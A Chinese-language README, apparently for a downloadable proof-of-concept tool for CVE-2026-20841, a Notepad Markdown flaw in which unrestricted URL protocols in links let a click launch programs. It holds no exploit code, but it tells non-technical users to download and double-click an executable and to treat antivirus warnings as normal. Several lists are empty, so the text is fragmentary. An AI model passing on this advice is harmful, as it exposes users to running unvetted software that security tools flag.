
🛠 演示通过Markdown链接利用不安全的URL协议在Windows记事本中实现远程代码执行。
CVE-2026-20841 是 Windows 记事本应用程序中一个已知的安全弱点。它影响 Markdown 功能,该功能允许记事本显示带有可点击链接的格式化文本。此弱点的产生是因为记事本内部运行的 Markdown 引擎没有限制其允许的链接类型(称为 URL 协议)。这意味着攻击者可以创建一个链接,当用户点击时,会导致记事本运行用户并未打算运行的程序或命令。
此工具提供了一个**概念验证(PoC)**来展示此安全漏洞的工作原理。它帮助安全研究人员和技术专家了解该漏洞的运作方式,并测试系统是否面临风险。
本项目面向以下人群:
运行此软件无需编程技能。最适合 IT 专业人员或希望检查其 Windows 设备的感兴趣用户。
在使用此软件之前,请确保您的计算机满足以下要求:
测试工具可能需要权限才能在您的 PC 上运行程序。您可能会看到 Windows Defender 或防病毒软件的警告。这很正常,因为该工具模拟了真实攻击可能的工作方式。
您只能在您拥有或有权测试的计算机上运行此工具。
要获取此软件,请执行以下操作:
.exe 文件,双击运行。.zip 文件,右键单击并选择“全部提取”,然后打开文件夹并双击里面的 .exe 文件。安装后,您将看到一个带有说明的简单窗口。具体步骤如下:
该工具创建一个包含使用非标准 URL 处理程序的链接的虚假 Markdown 文件。通常,这些链接不应在未经许可的情况下打开程序。但由于 CVE-2026-20841,记事本并不会阻止它们。
当您运行测试时,该软件尝试在记事本中打开这些链接。如果成功,则说明记事本存在漏洞,可能让攻击者运行有害代码。
为保证测试准确性,请在可用时下载新版本:
如果遇到问题,您可以:
本工具展示了黑客如何利用安全漏洞。请负责任地使用:
本项目涉及:
您现在可以通过访问下载页面开始测试:
下载 CVE-2026-20841 工具